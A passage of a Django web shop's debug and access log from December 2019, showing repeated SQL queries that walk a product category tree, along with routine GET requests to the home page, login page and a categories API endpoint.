"shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-09 07:16:16,547 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [09/Dec/2019 07:16:16] "GET /api/v1/categories/ HTTP/1.0" 200 1619 [09/Dec/2019 07:24:00] "GET / HTTP/1.0" 302 0 [09/Dec/2019 07:29:02] "GET / HTTP/1.0" 302 0 [09/Dec/2019 07:34:10] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-09 07:34:12,104 utils 32196 139885050582784 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'cipw0b3wycs5oenr6b83noa5ofq2n45a' LIMIT 1; args=('cipw0b3wycs5oenr6b83noa5ofq2n45a',) DEBUG 2019-12-09 07:34:12,105 utils 32196 139885050582784 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('cipw0b3wycs5oenr6b83noa5ofq2n45a', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-23T07:34:12.104593+00:00'::timestamptz); args=('cipw0b3wycs5oenr6b83noa5ofq2n45a', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 23, 7, 34, 12, 104593, tzinfo=)) [09/Dec/2019 07:34:12] "GET /login/?next=/ HTTP/1.0" 200 1786 [09/Dec/2019 07:38:09] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-09 07:38:26,932 utils 32196 139885050582784 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-09 07:38:26,937 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-09 07:38:26,940 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-09 07:38:26,942 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-09 07:38:26,944 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-09 07:38:26,946 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-09 07:38:26,948 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-09 07:38:26,950 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-09 07:38:26,952 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-09 07:38:26,954 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-09 07:38:26,957 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [09/Dec/2019 07:38:26] "GET /api/v1/categories/ HTTP/1.0" 200 1619 [09/Dec/2019 07:43:12] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-09 07:45:15,822 utils 32196 139885050582784 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-09 07:45:15,827 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-09 07:45:15,829 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-09 07:45:15,833 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-09 07:45:15,836 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-09 07:45:15,839 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-09 07:45:15,842 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-09 07:45:15,845 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-09 07:45:15,848 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-09 07:45:15,851 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-09 07:45:15,854 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [09/Dec/2019 07:45:15] "GET /api/v1/categories/ HTTP/1.0" 200 1619 [09/Dec/2019 07:48:14] "GET / HTTP/1.0" 302 0 [09/Dec/2019 07:53:17] "GET / HTTP/1.0" 302 0 [09/Dec/2019 07:56:28] "GET / HTTP/1.0" 302 0 [09/Dec/2019 07:58:19] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-09 08:00:38,359 utils 32196 139885050582784 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-09 08:00:38,364 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-09 08:00:38,366 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-09 08:00:38,369 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-09 08:00:38,371 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-09 08:00:38,373 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-09 08:00:38,375 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-09 08:00:38,378 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-09 08:00:38,380 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-09 08:00:38,382 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-09 08:00:38,384 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [09/Dec/2019 08:00:38] "GET /api/v1/categories/ HTTP/1.0" 200 1619 [09/Dec/2019 08:05:04] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-09 08:08:31,072 utils 32196 139885050582784 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-09 08:08:31,076 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-09 08:08:31,078 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-09 08:08:31,080 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-09 08:08:31,083 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-09 08:08:31,086 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-09 08:08:31,089 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-09 08:08:31,091 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-09 08:08:31,093 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-09 08:08:31,095 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-09 08:08:31,097 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [09/Dec/2019 08:08:31] "GET /api/v1/categories/ HTTP/1.0" 200 1619 DEBUG 2019-12-09 08:08:51,126 utils 32196 139885050582784 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-09 08:08:51,131 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-09 08:08:51,134 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-09 08:08:51,136 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-09 08:08:51,138 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-09 08:08:51,140 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-09 08:08:51,143 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-09 08:08:51,145 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-09 08:08:51,149 utils 32196 139885050582784 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-09 08:08:51,151 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-09 08:08:51,153 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [09/Dec/2019 08:08:51] "GET /api/v1/categories/ HTTP/1.0" 200 1619 DEBUG 2019-12-09 08:09:04,523 utils 32196 139885050582784 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-09 08:09:04,529 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-09 08:09:04,532 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-09 08:09:04,536 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-09 08:09:04,540 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-09 08:09:04,544 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-09 08:09:04,548 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-09 08:09:04,552 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-09 08:09:04,556 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-09 08:09:04,560 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", 